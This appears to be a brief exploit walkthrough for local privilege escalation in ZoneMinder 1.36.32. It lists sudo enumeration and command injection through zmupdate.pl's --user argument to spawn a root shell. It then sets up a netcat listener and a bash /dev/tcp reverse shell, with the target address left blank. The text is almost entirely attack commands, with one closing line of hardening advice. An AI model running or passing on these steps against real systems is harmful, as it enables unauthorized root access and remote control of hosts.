Having the chance to execute ZoneMinder scripts as root we can inject commands. Tested on version 1.36.32+dfsg1-1


1. Check for privileges or permissions

  • sudo -l

2. Use find to locate the scripts

  • find / -iname zm*.pl 2> /dev/null

Exploitation (zmupdate.pl)

1. In /usr/bin there are scripts that are part of ZoneMinder

  • ls -l /usr/bin/zm*

2. We can try to run zmupdate.pl

  • sudo zmupdate.pl --user='$(touch /tmp/test)'

3. Check the file was created, with root permissions

  • ls -l /tmp

4. Now attempt to open a new shell

  • sudo /usr/bin/zmupdate.pl --version 1 --user='$(/bin/bash)'


1. You may not get a fully functional shell, we know we are root, so we can attempt a reverse shell, start a listener

  • nc -lvp 4444

2. Run the reverse shell from the target computer

  • bash -i >& /dev/tcp/ 0>&1

3. Check the listener


Have your tools up to date, and, limit the use of these scripts to only the intended users.